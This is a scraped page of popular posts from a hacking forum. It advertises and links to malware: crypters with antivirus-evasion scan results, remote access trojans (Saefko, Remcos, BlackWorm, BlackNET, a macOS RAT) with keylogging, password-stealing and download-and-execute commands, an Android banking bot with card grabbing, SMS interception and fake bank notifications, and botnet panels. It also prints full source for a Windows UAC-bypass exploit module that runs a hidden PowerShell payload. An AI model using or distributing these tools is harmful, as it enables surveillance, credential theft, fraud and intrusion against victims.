Jump to content

Welcome to LeVeL23HackTools

Welcome to LeVeL23HackTools, like most online communities you must register to view or post in our community, but don't worry this is a simple free process that requires minimal information for you to signup. Be apart of LeVeL23HackTools by signing in or creating an account.

  • Start new topics and reply to others
  • Subscribe to topics and forums to get email updates
  • Get your own profile page and make new friends
  • Send personal messages to other members.

  • Announcements

    • dEEpEst


      You can download 5 files a day, if you want to make unlimited downloads you must buy PRIV8, you will have access to all the parts of the forum and you will be able to download unlimitedly without restrictions for a lifetime.


Popular Content

Showing most liked content since 12/23/2018 in all areas

  1. 47 points
    Recently added: - Outlook Password Recovery - Thunderbird Password Recovery - Reverse Proxy Download [Hidden Content] Pass level23hacktool
  2. 32 points
    File Name: CR7 Crypter LVL23N8.exe Scan Date: 2018-08-21 00:52:30 Detected by: 1/30 SHA256: 1e250e515903a6dc3338964e46cd1......7353665249287a992eca812323fa2 Checked by AntiScan.Me [Hidden Content] adaware: Clean ahnlab: Clean arcavir: Clean avast: Clean avg: Clean avira: Clean baidu360: Clean bitdef: Clean bullguard: Clean clam: Clean drweb: Clean emsisoft: Clean escan: Clean eset: Clean fortinet: Clean fprot: Clean fsecure: Clean gdata: Clean ikarus: Clean k7: Clean kis: Clean malwarebytes: Clean mcafee: Clean norton: Heur.AdvML.B sophos: Clean trustport: Clean vba32: Clean windef: Clean zillya: Clean zonealarm: Clean Download: [hide][Hidden Content]] Password: SINE256 > Level_Encryptor > TripleDes LVL23 gOIaxlbbEH3IDyOv+3zVpfz6pZMLSBfp5kMP7kYJ87whEPiFyxIA7ATQV2Hs1ljjSBOlGPw+QuxvmKj1oVG1aSOm9013GfrDTxmqSoxyMJJjrzhnBLmLeZh7IK6id2r8IvLkut4g64CG5wDEConlufHIuMXwrDUpdMoCIvs58H0=
  3. 28 points
    Saefko Attack Systems the most advance RAT-BOT-AGENT ever created This is "a multi protocol multi operating system" remote administration tool , This is the first system to use three protocols establishing all time communication , there is four main thing this design provides that no other system provide first Unlimited number of machines to control. Extreme reliability. Android and Windows control at the same time. No port forwarding. No mysql. This project was designed to replace all RAT/BOTS that are made to control remote machine,the problem with all current RATS/BOTS that they are unreliable and limited , you cant in 99.9% of the time have more than 100 machine or victim due to self flooding , self flooding meaning when the client connect to the server directly "when the rat connect to the attacker pc through TCP" . When the number of connected clients increased this acte as flood attack, so you will be limited to some low number and you will end up with lagy unreliable connection to the target machines. That's from the side of TCP rats the other side is the http bots ,that use a remote server containing some php scripts and mysql server , this design can handle unlimited number of machines in theory , but the problem with this design is that you do not have a direct connection to the machine so you are limited to http tasks and this dose not give you much control so that was just a quick short overview on some of extreme problems that RATS/BOTS facing with current techs,in Saefko Attack Systems "SAS" you combining both of these types of connections and adding IRC Protocol to the mix you will end up with extremely reliable connection to the target machine,SAS will handle millions of connections with direct TCP communications established through IRC networks any time any place all wither. Fast Setup Youtube : Main Windows Public HTTP Tasks Windows Build Android Build Command And Control Sections Android Command And Control Sections Android IRC Commands ANDROID COMMANDS [msg] Show toast message. [dexe] Download and execute a file in visible mode eg : 'dexe [Hidden Content]'. [hdexe] Download and execute a file in hidden mode eg : 'dexe [Hidden Content]'. [vistpage] Vist a webpage in visible mode eg : 'vistpage [Hidden Content]'. [hvistpage] Vist a webpage in hidden mode eg : 'hvistpage [Hidden Content]'. [snapshot] Get snapshot from camera eg : 'snapshot CAMERA_INDEX'. [ping] Ping the agent machine to check if still active. [location] Get geo location information based on 'ipinfo.com'. [flashon] Turn the dvice flash on. [flashoff] Turn the dvice flash on. [wakeup] Turn dvice screen on. [screenshot] Take a screenshot to from the target machine. GENERAL COMMANDS [clear] Clear the terminal. [opacity] Change the transparency of the terminal eg : 'opacity 0.4'. [myip] Show your public ip address that currently in use. [showtcpport] Show the public port used for TCP communications. [fontcolor] Change the font color eg : 'fontcolor #FFFFFF'. [ping] Ping the agent machine to check if still active. [info] Tells the agent to identify its machine and return short informations about it. [CTRL + C] CTRL + C to cancel any previous commands. [flashoff] Turn the dvice flash on. [cleanup] Close all windows that created by this control uint. [retcp] Order the TCP agent to reconnect , this command used in case of TCP connection is disconnected. [exit] Close the current agent window. Android TCP Commands Android Private HTTP Tasks HTTP Tasks Types Download And execute Show Message Box Visit Website Shell Commands Now Windows Command And Control Windows IRC Commands WINDOWS COMMANDS [pwd] Show current directory. [screenshot] Take a screenshot to from the target machine. [opencd] Open cd rom. [closecd] Close cd rom. [ping] Ping the agent machine to check if still active. [camlist] Get a list of available camera devices. [snapshot] Get snapshot from camera eg : 'snapshot CAMERA_INDEX'. [location] Get geo location information based on 'ipinfo.com'. [opencd] Open cd rom. [keylogs] Get agent saved keylogs through HTTP drop point. [shell] Run shell commands. [dexe] Download and execute a file in visible mode eg : 'dexe [Hidden Content]'. [hdexe] Download and execute a file in hidden mode eg : 'dexe [Hidden Content]'. [vistpage] Vist a webpage in visible mode eg : 'vistpage [Hidden Content]'. [hvistpage] Vist a webpage in hidden mode eg : 'hvistpage [Hidden Content]'. [uninstall] Uninstall the agent completely from the target machine. GENERAL COMMANDS [clear] Clear the terminal. [opacity] Change the transparency of the terminal eg : 'opacity 0.4'. [myip] Show your public ip address that currently in use. [showtcpport] Show the public port used for TCP communications. [fontcolor] Change the font color eg : 'fontcolor #FFFFFF'. [ping] Ping the agent machine to check if still active. [info] Tells the agent to identify its machine and return short informations about it. [CTRL + C] CTRL + C to cancel any previous commands. [flashoff] Turn the dvice flash on. [cleanup] Close all windows that created by this control uint. [retcp] Order the TCP agent to reconnect , this command used in case of TCP connection is disconnected. [exit] Close the current agent window. Windows TCP Commands Windows Private HTTP Tasks HTTP Tasks Types Download And execute Show Message Box Visit Website Shell Commands Download: [Hidden Content]
  4. 28 points
    The cryptors were taken from another forum, they were hidden from ordinary users. I decided to share with you. Take my friends ScanMyBin IMG IMG2 Download PCLOUD
  5. 27 points
    Name: Black Worm Version: 6.0 Function: Create a worm spread Working Platform: Vb.Net Framwork 4 Code Source before development: njQ8 Developer: Black.Hacker 1. Full Data Transfer Encryption using Base64 2. Modifed Icon Manager 3. Modifed Plugin Manager 4. Modifed Admin Checker 5. Modfied Plugin Invoking 6. Modifed Custom Plugin Invoking 7. DynuDNS Updater 8. NO-IP Automatic Updater 9. New About Page 10. Stable NexTGen WatchDog 11. Add to SchTask 12. Hard Install [ Stealth Mode ] 13. FileZilla Stealer 14. Clean Password Stealer [ Fixes ] 15. CPU,FireWall,Client Privileges,MUTEX Information 16. File Binder 17. Added More then 100 New Custom Icons 18. Modifed Desktop Infection 19. New Port Settings 20. New MUTEX Format (bWorm[xxxxxx-12345]) 21. Listview Style 22. Remove Empty Subs and Functions 23. Process Manager With Cusotm Colors 24. Command Shell 25. Remote Powershell 26. Remote Desktop 27. Keylogger Manager 28. Military Grade RSA Encryption With 4096bit Encryption Key for the Host and Port 29. Stable File Manager With a Downloading Large Files and Arabic Names Support 30. Critical Process 31. Updating Password Plugin 32. Added Produect Serial Stealer 33. Service Manger with Full Service Controller 34. Startup Manager 35. Victim Notification with XtremeRAT Sound 36. IP Tracker [ Removed From Dev-Point Version ] 37. Infect ZIP & RAR Files [ PoC ] [ Beta UnTested ] [ Dev By Black.Hacker using RAR.exe ] 38. Clients Groups [ Single and Multi Manager ] 39. Upgrade Software DotNET Framework From 2.0 to 4.0 34. Small GUI Changes 41. Small Fixes to the Socket to be more stable 42. Multi Transfer 43. Bug Fixes Download: [hide][Hidden Content]]
  6. 26 points
    [Hidden Content] Pass: level23hacktool
  7. 24 points
    Download: [hide][Hidden Content]] Password: level23hacktools.com
  8. 24 points
    Download: [HIDE][Hidden Content]] Password: level23hacktools.com
  9. 24 points
    Website: [Hidden Content] Download: [Hidden Content] Password: level23hacktool
  10. 23 points
    StegaCrypt is a crypter based on steganography. It offers encryption in one image. The source file is saved with an image of your choice, attached to the file and decrypted at runtime. The size of stub and detection depends by size of pictures... The following file formats are currently supported: Image formats: PNG, BMP, JPEG PE/EXE formats: .NET SOURCE [Hidden Content]
  11. 22 points
    BlackWorm - .NET Based Worm Controller What can you do Show Device's Informations. Upload a file to the Victim. Execute DLL Plugins. Kill a process. Dump The Target Passwords. Start DDOS ATTACKS. Ransomware idea from LimeRAT. You Can Transfer The Target from Host to Host. Dump Desktop Screenshot. Execute Scripts on The Target Device. Elevate Your Privilegs. and alot more. About The Developer Black.Hacker aka BlackMafia aka BlackPsycho Developer of Black Software Tools Black Worm Black Worm Generator Black Downloader Generator Black Cryptor Black Miner BlackRAT 7 Udemy Cources Certifications Udacity Certification CEO of Dark Software Company Leader of Black Ninja Team I know more then 7 Programing languages About Black Wom a .NET Basesd Worm Controller with a bunch of opretions to execute on the Target Device With alot of new features Video: Download : [Hidden Content]
  12. 19 points
    Download: [HIDE][Hidden Content]] Password: level23hacktools.com
  13. 19 points
    Scan: [HIDE][Hidden Content]] Download: [HIDE][Hidden Content]] Password: level23hacktools.com
  14. 19 points
    Download: [HIDE][Hidden Content]] Password: level23hacktools.com
  15. 18 points
    Download [Hidden Content] Pass level23hacktool
  16. 17 points
    Scan: Stub(0/22) :[Hidden Content] Njrat before(21/22) :[Hidden Content] Njrat after(0/22) :[Hidden Content] Download: [HIDE][Hidden Content]] Password: level23hacktools.com
  17. 17 points
    ## # This module requires Metasploit: [Hidden Content] # Current source: [Hidden Content] ## require 'msf/core/exploit/exe' require 'msf/core/exploit/powershell' class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Exploit::Powershell include Post::Windows::Priv include Post::Windows::Registry include Post::Windows::Runas COMPUTERDEFAULT_DEL_KEY = "HKCU\\Software\\Classes\\ms-settings".freeze COMPUTERDEFAULT_WRITE_KEY = "HKCU\\Software\\Classes\\ms-settings\\shell\\open\\command".freeze EXEC_REG_DELEGATE_VAL = 'DelegateExecute'.freeze EXEC_REG_VAL = ''.freeze # This maps to "(Default)" EXEC_REG_VAL_TYPE = 'REG_SZ'.freeze COMPUTERDEFAULT_PATH = "%WINDIR%\\System32\\computerdefault.exe".freeze CMD_MAX_LEN = 16383 def initialize(info = {}) super( update_info( info, 'Name' => 'Windows UAC Protection Bypass (Via ComputerDefault Registry Key)', 'Description' => %q{ This module will bypass Windows 10 UAC by hijacking a special key in the Registry under the current user hive, and inserting a custom command that will get invoked when the Windows computerdefault.exe application is launched. It will spawn a second shell that has the UAC flag turned off. This module modifies a registry key, but cleans up the key once the payload has been invoked. The module does not require the architecture of the payload to match the OS. If specifying EXE::Custom your DLL should call ExitProcess() after starting your payload in a separate process. }, 'License' => MSF_LICENSE, 'Author' => [ 'St0rn - Synetis.com', # UAC bypass discovery and research 'St0rn - fabien.dromas@synetis.com', # MSF module ], 'Platform' => ['win'], 'SessionTypes' => ['meterpreter'], 'Targets' => [ [ 'Windows x86', { 'Arch' => ARCH_X86 } ], [ 'Windows x64', { 'Arch' => ARCH_X64 } ] ], 'DefaultTarget' => 0, 'References' => [ [ 'URL', '[Hidden Content]' ] ], 'DisclosureDate' => 'October 22 2018' ) ) end def check if sysinfo['OS'] =~ /Windows (10)/ && is_uac_enabled? Exploit::CheckCode::Appears else Exploit::CheckCode::Safe end end def exploit commspec = '%COMSPEC%' registry_view = REGISTRY_VIEW_NATIVE psh_path = "%WINDIR%\\System32\\WindowsPowershell\\v1.0\\powershell.exe" # Make sure we have a sane payload configuration if sysinfo['Architecture'] == ARCH_X64 if session.arch == ARCH_X86 # fodhelper.exe is x64 only exe commspec = '%WINDIR%\\Sysnative\\cmd.exe' if target_arch.first == ARCH_X64 # We can't use absolute path here as # %WINDIR%\\System32 is always converted into %WINDIR%\\SysWOW64 from a x86 session psh_path = "powershell.exe" end end if target_arch.first == ARCH_X86 # Invoking x86, so switch to SysWOW64 psh_path = "%WINDIR%\\SysWOW64\\WindowsPowershell\\v1.0\\powershell.exe" end else # if we're on x86, we can't handle x64 payloads if target_arch.first == ARCH_X64 fail_with(Failure::BadConfig, 'x64 Target Selected for x86 System') end end if !payload.arch.empty? && (payload.arch.first != target_arch.first) fail_with(Failure::BadConfig, 'payload and target should use the same architecture') end # Validate that we can actually do things before we bother # doing any more work check_permissions! case get_uac_level when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP, UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP, UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT fail_with(Failure::NotVulnerable, "UAC is set to 'Always Notify'. This module does not bypass this setting, exiting...") when UAC_DEFAULT print_good('UAC is set to Default') print_good('BypassUAC can bypass this setting, continuing...') when UAC_NO_PROMPT print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead') shell_execute_exe return end payload_value = rand_text_alpha(8) psh_path = expand_path(psh_path) template_path = Rex::Powershell::Templates::TEMPLATE_DIR psh_payload = Rex::Powershell::Payload.to_win32pe_psh_net(template_path, payload.encoded) if psh_payload.length > CMD_MAX_LEN fail_with(Failure::None, "Payload size should be smaller then #{CMD_MAX_LEN} (actual size: #{psh_payload.length})") end psh_stager = "\"IEX (Get-ItemProperty -Path #{COMPUTERDEFAULT_WRITE_KEY.gsub('HKCU', 'HKCU:')} -Name #{payload_value}).#{payload_value}\"" cmd = "#{psh_path} -nop -w hidden -c #{psh_stager}" existing = registry_getvaldata(COMPUTERDEFAULT_WRITE_KEY, EXEC_REG_VAL, registry_view) || "" exist_delegate = !registry_getvaldata(COMPUTERDEFAULT_WRITE_KEY, EXEC_REG_DELEGATE_VAL, registry_view).nil? if existing.empty? registry_createkey(COMPUTERDEFAULT_WRITE_KEY, registry_view) end print_status("Configuring payload and stager registry keys ...") unless exist_delegate registry_setvaldata(COMPUTERDEFAULT_WRITE_KEY, EXEC_REG_DELEGATE_VAL, '', EXEC_REG_VAL_TYPE, registry_view) end registry_setvaldata(COMPUTERDEFAULT_WRITE_KEY, EXEC_REG_VAL, cmd, EXEC_REG_VAL_TYPE, registry_view) registry_setvaldata(COMPUTERDEFAULT_WRITE_KEY, payload_value, psh_payload, EXEC_REG_VAL_TYPE, registry_view) # Calling fodhelper.exe through cmd.exe allow us to launch it from either x86 or x64 session arch. cmd_path = expand_path(commspec) cmd_args = expand_path("/c #{COMPUTERDEFAULT_PATH}") print_status("Executing payload: #{cmd_path} #{cmd_args}") # We can't use cmd_exec here because it blocks, waiting for a result. client.sys.process.execute(cmd_path, cmd_args, { 'Hidden' => true }) # Wait a copule of seconds to give the payload a chance to fire before cleaning up # TODO: fix this up to use something smarter than a timeout? Rex::sleep(5) handler(client) print_status("Cleaining up registry keys ...") unless exist_delegate registry_deleteval(COMPUTERDEFAULT_WRITE_KEY, EXEC_REG_DELEGATE_VAL, registry_view) end if existing.empty? registry_deletekey(COMPUTERDEFAULT_DEL_KEY, registry_view) else registry_setvaldata(COMPUTERDEFAULT_WRITE_KEY, EXEC_REG_VAL, existing, EXEC_REG_VAL_TYPE, registry_view) end registry_deleteval(COMPUTERDEFAULT_WRITE_KEY, payload_value, registry_view) end def check_permissions! fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system? # Check if you are an admin vprint_status('Checking admin status...') admin_group = is_in_admin_group? unless check == Exploit::CheckCode::Appears fail_with(Failure::NotVulnerable, "Target is not vulnerable.") end unless is_in_admin_group? fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module') end print_status('UAC is Enabled, checking level...') if admin_group.nil? print_error('Either whoami is not there or failed to execute') print_error('Continuing under assumption you already checked...') else if admin_group print_good('Part of Administrators group! Continuing...') else fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module') end end if get_integrity_level == INTEGRITY_LEVEL_SID[:low] fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level') end end end
  18. 16 points
    Download: [HIDE][Hidden Content]] Password: level23hacktools.com
  19. 14 points
    Download: [HIDE][Hidden Content]] Password: level23hacktools.com
  20. 14 points
    Features of the bot: - Graber cards - Spam on user contacts - Calling the number - Forwarding incoming calls - Launching user applications - Automatic withdrawal of fake notifications, with taken bank icons - Interception, block-deleting incoming SMS, sending, including short numbers - Download all user application names - Graber contacts - Screen locker - Launch pages in the browser - Launch user applications - Search for Bank applications - Browser history graber - Socks5 module - Sending USSD - Geolocation - Spam by number base Admin panel: Detailed statistics on countries, app, url histories, selerians, etc. The ability to issue commands to a particular bot, group, as well as all newcomers. Search by imei, sorting by installed applications, online bots, seler, countries. Cleaning of old logs. Separate statistics for traffic. Jabber notification. There is a possibility to load their injections, with the admin panel. Search by SMS, logs. Searching for links by history. The statistics for the tasks that have been issued are fulfilled. Etc. Additional info: The size of the bot is 150 kb. Stable work on Android 4-7. For basic work, root rights are not required. Request admin rights. To change the phone password, you need the admin rights (requested when installing). Change the password to Android Nougat (Android 7) version in part. Sending and intercepting SMS on all versions, deleting up to 4.4, downloading all SMS from 4.4, block SMS over 4.4 via SMS manager / Screen Locker (when locked via SMS manager, SMS is not seen only by the Holder). Permanent withdrawal of bank (fake) notifications with bank icons, the text can be set with the admin panel when you click on the message the injection is started. In the presence of injections of euro countries, they are bundled with a bot. An additional functional is possible. Android Bot Loki We want to offer a bot of our own developments. A completely new bot engine, the wishes of the customers are part of the functions of are automated, advanced functionality. Bot features: - Card grabber - Phone contacts spam - Custom numbers spam - Call to number - Incoming call forwarding - Start user applications - Automatic invoke fake notifications with custom icons - Catch, block, delete incoming SMS. Sent new SMS - Get list of user applications - Contact grabber - Screen locker - Web application browser - Bank applications searching - Browser history grabber - Socks5 module - Geolocation Admin panel: Detalized statistics of countries, app, history, sellers etc ... Ability for send command to one, list , or only new bots. IMEI search. Sort by installed applications, online, sellers, countries. Cleanup old logs Dedicated statistics for sellers. Jabber notifications. Admin panel have an ability to upload your own injects. SMS, logs searching. History links searching. Task statistiks. Additional information: Bot size: 150kb Bot is working with Android 4-7 Root permissions is NOT required for common actions. There are request for getting root permissions Root permissions required for Image phone password changing Phone password changing for All Android Nougat (All Android 7) of Post Send and catch statement SMS works on all All Android versions, the delete works only for 4.4, download and block SMS works All Android 4.4 and newest Permanent display bank notifications with custom text from admin panel. Bot have injects for euro countries. \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ Loki admin panel install instructions: apt-get update && apt-get upgrade -y apt-get install apache2 libapache2-mod-php5 mysql-server php5 php5-mysql -y apt-get install default-jre default-jdk -y Debian 7: apt-get install ia32-libs lib32z1 lib32ncurses5 -y Debian 8: dpkg --add-architecture i386 apt-get update apt-get install libstdc++6:i386 libgcc1:i386 zlib1g:i386 libncurses5:i386 lib32z1 lib32ncurses5 Next: wget [Hidden Content] wget -O apktool.jar [Hidden Content] chmod +x ~/apktool.jar chmod +x ~/apktool mv ~/apktool.jar /usr/local/bin/ mv ~/apktool /usr/local/bin/ Next: unpack loki.tar to new dir. something like that: tar xf loki.tar -C /var/www/ change files owner: chown -R www-data:www-data /var/www/ Run: mysql create database loki; grant all privileges on loki.* to loki@localhost identified 'DB_PASSWORD'; grant all privileges on loki.* to loki@localhost identified by 'DB_PASSWORD'; quit import bd file loki4dev.sql: mysql loki < /var/www/site/loki4dev.sql mysql -u root -pbolonka1 loki </var/www/site/loki4dev.sql Edit: /var/www/site/db.php and enter mysql database access: db: loki db user: loki db password: DB_PASSWORD DONE!!!! address admin panel [Hidden Content] or [Hidden Content] login with name bot4fun and password J1HPbmr ...................................................................... Download: [HIDE][Hidden Content]] Password: level23hacktools.com
  21. 14 points
    REMCOS Professional v1.7 (Cracked and Fixed) Remcos is a lightweight and fast Remote Administration Tool with a wide array of functionalities, contained in a tiny package The Server part, written in C++, is only ~90 kb of size uncompressed and contains all the functions. Performance and speed have been a priority in the development. INFO No dependencies, and fully compatible with any Windows from WinXP to Win10, 32-64 bit, including Server editions. Remcos will not require any extra dependency to run. All it needs is contained in any standard Windows installation. Robust connection: * Robust Keep alive system makes sure your connection with the remote host/s will never get lost. * 100% Encrypted connection protects transmitted data from sniffers. Not a single byte is sent un-encrypted. * Backup connection addresses will make sure your remote host will connect even if one or more addresses go offline. Auto-Tasks: You don't even have to sit at the computer: Download logs and files, and performs other actions automatically on hosts connection. Mass Commands: You can send any command to more then one remote host, or even to all the connected ones in same time. Search for a file name on all your machines network, download&execute a file, shutdown all of them and much more. Surveillance functions: Transform the remote machine in a completely stealth surveillance station. *Password recovery lets you recover remotely saved passwords from all browsers (IE, Firefox, Chrome, Safari, Opera), and various Instant Messaging software (Pidgin, Trillian, Miranda, ICQ, and more.) And from MS Outlook POP3, IMAP...etc *ScreenLogger takes screenshots on a time-interval basis or when the user opens some chosen windows, webpages or programs. SS's are stored encrypted and are erased when the remote operator retrieves them. *Offline Keylogger stores logs totally encrypted, and will wipe them out after sending them to C&C operator. *Online Keylogger lets you see what remote user types (and which window opens) in realtime. *Camera Capture lets you capture a live stream of the remote camera, and save frames to disk. *Microphone Capture lets you capture the audio from the machine's microphone in real-time, or even when you are offline, storing audio files. Extra-Stealth: Want to use Remcos as a stealthy remote surveillance tool? Process Injection, Anti-Analysis techniques, total encryption of connection and stored logs, and full compatibility with exe Protectors, will make it hard to spot. Connections Interface Here you can view all connected hosts,and send commands to one or more of them. Wide array of functions which can be performed on one or more hosts at the same time. Despite its wide range of functionalities, Remcos Server its contained in a single ~90 kb C++ executable. That's because performance has always been a priority in the development, as well as maximum compatibility with any Windows system. Password Recovery Recover remote passwords from any popular browser: Internet Explorer - Google Chrome - Mozilla Firefox - Safari - Opera and from MS Outlook POP3, IMAP...etc and from a wide variety of Instant Messaging software: Pidgin - Trillian - Miranda - ICQ - Digsby - PaltalkScene - Windows MSN/Live Messenger ScreenLogger take automatically screenshots offline, and store them encrypted. View and download screenshots comfortably anytime. Screenshots can be taken each x minutes, or when window title or webpage contains a word from a word-list. This allows you to take screenshots automatically anytime the user opens some webpage or application of interest. Keylogger Remcos includes powerful and versatile Keylogger functionality. Offline Keylogger will automatically log data and store it encrypted on the remote machine. You can retrieve it anytime, manually or automatically via AutoTasks. Remcos Keylogger captures: Keystrokes - Active Window - Clipboard Copy/Paste - Idle time Online Keylogger let's you see what's going on in realtime, without storing any remote log! Any single keystroke will be displayed as soon as typed. Selective Keylogger Want to capture only user input which happens in one or more defined windows, programs or webpages? With the Selective Keylogger mode, the Keylogger will self-activate when user enters a target window, and will self-disable when exits from it. Automatic Tasks Automatically send tasks to hosts as soon as they connect. Download logs and files, update/uninstall your remote client, and more. Without needing your physical presence at the PC. Download: [Hide][Hidden Content]] Password: level23hacktools.com
  22. 13 points
    Download: [HIDE][Hidden Content]] Password: level23hacktools.com
  23. 12 points
  24. 12 points
    Scan: [Hidden Content] Download: [HIDE][Hidden Content]] Password: level23hacktools.com
  25. 11 points
    Pass level23hacktools Download [Hidden Content]
  26. 11 points
    [HIDE][Hidden Content]] scan Binder: [Hidden Content] Scan Result: File Name: done.exe Scan Date: 14-01-2019 08:27:43 Detected by: 0/30 MD5: 7b83f247f93a573ae49674dd04e171f6 Checked by AntiScan.Me [Hidden Content] adaware: Clean ahnlab: Downloader/Win32.Agent.C377292 alyac: Clean avast: Clean avg: Clean avira: Contains recognition pattern of the DR/Delphi.Gen dropper bitdef: Clean bullguard: Clean clam: Clean comodo: Clean drweb: Clean emsisoft: Clean nod32: Clean fortinet: Clean fsec: Clean ikarus: Clean kasper: Clean mcafeetp: Clean mbytes: Clean pandagp: Clean sophos: Clean trend: Clean webroot: Clean mssec: Clean zonealarm: Clean zillya: Trojan.Agent.Win32.1003488
  27. 11 points
    Download: [HIDE][Hidden Content]] Password: level23hacktools.com
  28. 11 points
    The Hacker Machine 2 is a search engines for hackers and crackers to search for software, references or common hacker/cracker questions. Download [Hidden Content] Virus Scan [Hidden Content]
  29. 11 points
    Download: [hide][Hidden Content]] Password: level23hacktools.com
  30. 11 points
    This joint can glue up to two files at a time. An exceptional feature of this joener is a clean stub! Ability to select icons for your gluing. You can add an edition file. Joyner is completely native and has no dependencies. Scan: (I have not uploaded it to Virustotal, it was already uploaded from the beginning by the creator) Stub: [Hidden Content] Builder: [Hidden Content] Download: [HIDE][Hidden Content]] Password level23hacktools.com
  31. 11 points
    Native --------- Work Win ( 7 - 8 - 8.1 - 10 -xp -Vista - 2000 - 98 - 95 ) 64 & 32 Bit Scanne Feature ——- – Persistence startUp (even if it deleted ) – sleep – hide proccess (32bit) – Usb spread shortCut New method – Upx – spoof any extention (scr) – Disable teskmgr & Msconfig – Av Obfuscator Usg server Fud – Uac Exploit 0 day disable & enable - Bypass AV scanne & Runtime with Unique Stub Generator (USG) - Startup Scheduled - Hide instalation - 2 Costom Builder - Icone changer - Binder any kind of file ilimited & not run in startup Option ——- – File Manager – Remote Desktop – Web cam capture – Sound capture – Get password (all last browser 2 method – nirsoft & Downloader & Outlook) * Browser Firefox Internet Explorer Google Chrome Chrome Canary/SXS CoolNovo Browser Opera Browser Apple Safari Flock Browser SeaMonkey Browser SRWare Iron Browser Comodo Dragon Browser * EMaile Microsoft Outlook Express Microsoft Outlook 2002/XP/2003/2007/2010/2013 Mozilla Thunderbird Windows Live Mail 2012 IncrediMail Opera Mail The Bat! Foxmail v6.x – v7.x Windows Live Messenger MSN Messenger Google Talk GMail Notifier PaltalkScene IM Pidgin (Formerly Gaim) Messenger Miranda Messenger Windows Credential Manager – proccess Manager – remote Cmd – Online Keylogger – Form graber log + images – remote chat – download & execut - Upload & execut – Open Url – Uac exploit – Delete Cookis (chrome + firfox) – Spreaker ( Virus speak what you writ ) – outluk Delete Profile & pass – open cd & close Download: [HIDE][Hidden Content]] Password: level23hacktools.com
  32. 10 points
    Download: [HIDE][Hidden Content]] Password: level23hacktools.com
  33. 10 points
    You can use Remcos Free Edition without the need to register an account. Download “Remcos Free Edition”remcos-v2.2.0-Light.zip – Downloaded 17785 times – 17 MB Remote Support: With Remcos Free you’ll have access to all the system management and support functions! You will be easily able to: do remote support sessions easily using Remote Desktop and Chat Manage and transfer your files Check and manage your System (Process Manager, real-time RAM/CPU viewer, Remote Shell and much more) Remote Administration: With Remcos Free you can administrate up to 15 remote machines at the same time.
  34. 10 points
    Download: [HIDE][Hidden Content]] Password: level23hacktools.com
  35. 10 points
  36. 10 points
    Smoke botnet - Keylogger - Miner - formgrabber - Ring3kit (very lightway) - File loader. I include also the two builders, check them Under builder1 and builder2 folder. Webpanel with all his plugins is also included. [Hidden Content]
  37. 10 points
    Scan: Download: [hide][Hidden Content]] Password: level23hacktools.com
  38. 10 points
    Ultimate license is inside Download: [hide][Hidden Content]] Password: level23hacktools.com
  39. 9 points
    The Hacker Machine 2 is a search engines for hackers and crackers to search for software, references or common hacker/cracker questions. Download [Hidden Content]_(Updated_20-01-2019).zip Virus Scan [Hidden Content]
  40. 9 points
    An evil RAT (Remote Administration Tool) for macOS / OS X. Features Emulate a terminal instance Simple extendable module system No bot dependencies (pure python) Undetected by anti-virus (OpenSSL AES-256 encrypted payloads) Persistent GUI and CLI support Retrieve Chrome passwords Retrieve iCloud tokens and contacts Retrieve/monitor the clipboard Retrieve browser history (Chrome and Safari) Phish for iCloud passwords via iTunes iTunes (iOS) backup enumeration Record the microphone Take a desktop screenshot or picture using the webcam Attempt to get root via local privilege escalation This project was created to be used with Rubber Ducky see link download for more info Source & Download : [hide][Hidden Content]]
  41. 9 points
    BlackNET A Free PHP Interface Botnet with VB.NET based Stub and Builder About BlackNET BlackNET is a simple botnet with PHP Panel and VB.NET Output Created By : DarkSoftwareCo What You Can Do Upload File DDOS Attack [ TCP,UDP,ARME,Slowloris ] Open Webpage Show MessageBox Uninstall Client Close Client How to Install PHP Panel Download BlackNET - PHP Panel.zip Upload The ZIP File to your Server Extract it Go to PHPMyAdmin Create a database with any name you want Change the data in config.php Change blacknet files and folders permission to 777 Go to db.php to create the botnet tables automatically Go to register.php then create a new account Enter you network and enjoy hacking Screenshot Client Detection Rate Copyright Copyright © Black.Hacker and DarkSofrwareCo - 2019 Download: [Hidden Content]
  42. 9 points
    Android Crypter/Decrypter App Generator Features: Encryption extensions: txt, png, bmp, jpg, mp3, mp4, mpeg, doc, docx, etc (edit app/crypter.part3 to add more) Encrypter/Decrypter using Custom Password Payload Server, Obfuscated URL by Tinyurl Fully Undetectable Install Dependencies: # bash install.sh Installing on Kali Linux: Install dependencies: # apt-get update # apt-get install default-jdk apksigner For x86: # apt-get install libc6-dev-i386 lib32z1 For AMD64: # apt-get install lib32z1 lib32ncurses6 lib32stdc++6 Download SDK-Tools: # wget [Hidden Content] #mkdir -p $HOME/Android/Sdk # unzip sdk-tools-linux* -d $HOME/Android/Sdk Install SDKMAN # curl -s "[Hidden Content]" | bash # source "$HOME/.sdkman/bin/sdkman-init.sh" # echo "Y" | sdk install java 8.0.191-oracle # sdk use java 8.0.191-oracle # sdk install gradle 2.14.1 # sdk use gradle 2.14.1 # echo "y" | $HOME/Android/Sdk/tools/bin/sdkmanager "platforms;android-25" "build-tools;25.0.1" "extras;google;m2repository" "extras;android;m2repository" # git clone [Hidden Content] # cd crydroid # bash crydroid.sh [Hidden Content]
  43. 9 points
    Download: [HIDE][Hidden Content]] Password: level23hacktools.com
  44. 9 points
    Crypter Morpheous File Name : morpheous.exe File Size : 351.50 KB Date Scanned : 2018-12-12 11:09:03 MD5 : b973c319b6cd6549b8a39d6de7d3c51f Detection : 16 / 22 [Hidden Content] ____________________________ Crypter 404 File Information File Name : aaaaaaa.exe File Size : 264.00 KB Date Scanned : 2018-12-12 11:04:30 MD5 : 2b3ec58d7434b57ca16d8ca8e9b788d0 Detection : 14 / 22 [Hidden Content]
  45. 9 points
